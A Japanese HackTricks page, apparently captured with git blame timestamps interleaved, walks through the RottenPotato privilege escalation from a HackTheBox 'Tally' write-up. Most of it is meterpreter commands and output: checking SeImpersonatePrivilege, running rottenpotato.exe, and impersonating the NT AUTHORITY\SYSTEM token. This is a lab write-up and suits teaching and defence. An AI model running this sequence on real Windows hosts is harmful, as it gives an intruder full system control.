2022-05-08 23:13:03 +00:00
# RottenPotato
2022-04-28 16:01:33 +00:00
< details >
2024-01-09 15:31:32 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > をチェックしてください!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-09 15:31:32 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-01-09 15:31:32 +00:00
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手してください。
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックしてください。
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**テレグラムグループ**](https://t.me/peass)に**参加するか**、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を**フォローしてください。**
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)や[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有してください。
2022-04-28 16:01:33 +00:00
< / details >
2024-01-09 15:31:32 +00:00
このページの情報は[この投稿から抜粋されました](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/)
2020-07-15 15:43:14 +00:00
2024-01-09 15:31:32 +00:00
サービスアカウントは通常、特別な権限( SeImpersonatePrivileges) を持っており、これを利用して権限を昇格させることができます。
2020-07-15 15:43:14 +00:00
[https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ ](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ )
2024-01-09 15:31:32 +00:00
このエクスプロイトがどのように機能するかの詳細については説明しません。上記の記事が私が説明するよりも遥かに優れています。
2020-07-15 15:43:14 +00:00
2024-01-09 15:31:32 +00:00
meterpreterで私たちの権限を確認しましょう:
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
```
2024-01-09 15:31:32 +00:00
```
優れています。攻撃を実行するために必要な権限を持っているようです。`rottenpotato.exe`をアップロードしましょう。
2020-07-15 15:43:14 +00:00
2024-01-09 15:31:32 +00:00
meterpreterセッションに戻り、`incognito`拡張機能をロードします。
```
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
2023-07-07 23:42:27 +00:00
Call rev2self if primary process token is SYSTEM
2020-07-15 15:43:14 +00:00
Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah
Impersonation Tokens Available
========================================
No tokens available
```
2024-01-09 15:31:32 +00:00
現在、偽装トークンが存在しないことがわかります。Rotten Potatoエクスプロイトを実行しましょう。
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
meterpreter > execute -f rottenpotato.exe -Hc
Process 3104 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
2023-07-07 23:42:27 +00:00
Call rev2self if primary process token is SYSTEM
2020-07-15 15:43:14 +00:00
Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah
Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM
```
2024-01-09 15:31:32 +00:00
トークンをすぐに偽装する必要があります。さもなければ、それは消えてしまいます。
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
2023-07-07 23:42:27 +00:00
Call rev2self if primary process token is SYSTEM
2020-07-15 15:43:14 +00:00
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
2024-01-09 15:31:32 +00:00
成功! SYSTEMシェルを取得し、root.txtファイルを掴むことができました!
2020-07-15 15:43:14 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-01-09 15:31:32 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > をチェック!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-09 15:31:32 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-01-09 15:31:32 +00:00
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を**フォローする**。
* [**HackTricks** ](https://github.com/carlospolop/hacktricks )と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
2022-04-28 16:01:33 +00:00
< / details >